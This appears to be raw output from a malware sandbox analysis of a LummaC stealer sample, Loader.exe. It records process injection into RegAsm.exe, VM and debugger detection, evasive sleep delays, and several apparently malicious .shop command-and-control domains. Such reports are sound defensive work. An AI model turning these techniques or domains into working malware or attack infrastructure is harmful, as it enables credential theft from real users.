Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A4EA	2_2_0041A4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433D5E	2_2_00433D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040F578	2_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A500	2_2_0040A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042C521	2_2_0042C521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00420D30	2_2_00420D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00431530	2_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00428535	2_2_00428535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043D5DE	2_2_0043D5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041CDED	2_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00421DB5	2_2_00421DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042AE2B	2_2_0042AE2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E6C0	2_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043F6F0	2_2_0043F6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004306F7	2_2_004306F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406E80	2_2_00406E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00436E82	2_2_00436E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00430EAE	2_2_00430EAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401FC5	2_2_00401FC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00404FD0	2_2_00404FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00418FD5	2_2_00418FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402FE0	2_2_00402FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004357E0	2_2_004357E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042EF89	2_2_0042EF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043DF90	2_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004237A0	2_2_004237A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040AA20 appears 134 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768

Source: Loader.exe, 00000000.00000002.2034024823.000000000103E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs Loader.exe

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/6@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004365E0 CoCreateInstance,

2_2_004365E0

Source: C:\Users\user\Desktop\Loader.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\876357eb-762c-4857-85e2-bda122f00970

Jump to behavior

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Loader.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Loader.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb source: Loader.exe
Source:	Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb0 source: Loader.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0043504B push ss; retf

2_2_0043504F

Source: Loader.exe

Static PE information: section name: .text entropy: 7.994081518610872

Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 2E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 4E20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe TID: 940	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6200	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Loader.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001026000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_2-15896

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0043C800 LdrInitializeThunk,

2_2_0043C800

Source: C:\Users\user\Desktop\Loader.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_02E2249D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02E2249D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: froytnewqowv.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D0D008	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Queries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Loader.exe, 00000000.00000002.2034024823.0000000001076000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Loader.exe, 00000000.00000002.2034024823.0000000001076000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
